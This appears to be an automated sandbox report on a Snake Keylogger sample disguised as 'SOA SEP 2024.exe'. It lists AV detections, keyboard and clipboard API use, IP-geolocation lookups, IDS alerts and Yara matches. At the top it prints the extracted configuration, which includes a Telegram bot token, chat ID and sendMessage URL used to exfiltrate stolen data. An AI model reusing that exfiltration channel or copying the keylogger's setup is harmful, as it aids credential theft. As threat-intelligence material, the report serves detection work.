Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7399492470:AAF1Q52TLq6uEICFiCVrLu9dpROnjh2wukI/sendMessage?chat_id=1443320838", "Token": "7399492470:AAF1Q52TLq6uEICFiCVrLu9dpROnjh2wukI", "Chat_id": "1443320838", "Version": "5.1"}

Multi AV Scanner detection for submitted file

Source: SOA SEP 2024.exe	ReversingLabs: Detection: 31%
Source: SOA SEP 2024.exe	Virustotal: Detection: 27%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SOA SEP 2024.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: SOA SEP 2024.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0

Source:	Binary string: _.pdb source: RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: SOA SEP 2024.exe, 00000000.00000003.2096647600.0000000003690000.00000004.00001000.00020000.00000000.sdmp, SOA SEP 2024.exe, 00000000.00000003.2096906807.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: SOA SEP 2024.exe, 00000000.00000003.2096647600.0000000003690000.00000004.00001000.00020000.00000000.sdmp, SOA SEP 2024.exe, 00000000.00000003.2096906807.00000000034F0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_007A6CA9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_007A60DD
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007A63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_007A63F9
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007AEB60
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AF56F FindFirstFileW,FindClose,	0_2_007AF56F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007AF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_007AF5FA
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007B1B2F
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_007B1C8A
Source: C:\Users\user\Desktop\SOA SEP 2024.exe	Code function: 0_2_007B1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_007B1F94

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	2_2_02DCE128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAB781h	2_2_06BAB4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BA045Dh	2_2_06BA0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BACD39h	2_2_06BACA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAD191h	2_2_06BACEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAC8E1h	2_2_06BAC638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAF8A9h	2_2_06BAF600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BADA41h	2_2_06BAD798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BA045Dh	2_2_06BA038B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BADE99h	2_2_06BADBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAAA79h	2_2_06BAA7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAA1C9h	2_2_06BA9F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAA621h	2_2_06BAA378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAD5E9h	2_2_06BAD340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAE749h	2_2_06BAE4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAB329h	2_2_06BAB080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAEBA1h	2_2_06BAE8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAAED1h	2_2_06BAAC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BA045Dh	2_2_06BA0006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAE2F1h	2_2_06BAE048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAF451h	2_2_06BAF1A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAC031h	2_2_06BABD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAC489h	2_2_06BAC1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BABBD9h	2_2_06BAB930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BAEFF9h	2_2_06BAED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC58C1h	2_2_06BC5618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC77E5h	2_2_06BC74A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC619Ah	2_2_06BC5EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC6A49h	2_2_06BC67A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC4761h	2_2_06BC44B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06BC256E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC5011h	2_2_06BC4D68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC8322h	2_2_06BC8278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC5D19h	2_2_06BC5A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC8322h	2_2_06BC8270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06BC2258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	2_2_06BC2247
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC6EA1h	2_2_06BC6BF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC65F1h	2_2_06BC6348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC42E1h	2_2_06BC4038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC72F9h	2_2_06BC7050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC5469h	2_2_06BC51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06BC4BB9h	2_2_06BC4910

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4176458.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.4175570.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2ee5dce.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.67.152:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.5:49705 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007B4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_007B4EB5

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003359000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000031D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555060395.0000000004171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553461018.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4555306563.0000000005650000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: RegSvcs.exe, 00000002.00000002.4553786112.0000000003340000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4553786112.00000000032F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007B6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_007B6B0C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007B6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_007B6D07

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

0_2_007B6B0C

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007A2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_007A2B37

Source: C:\Users\user\Desktop\SOA SEP 2024.exe

Code function: 0_2_007CF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_007CF7FF

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.SOA SEP 2024.exe.6c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750000.7.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.4175570.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee4ee6.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.4176458.4.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5650000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.41a9590.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750000.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5650000.6.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 2.2.RegSvcs.exe.5750ee8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
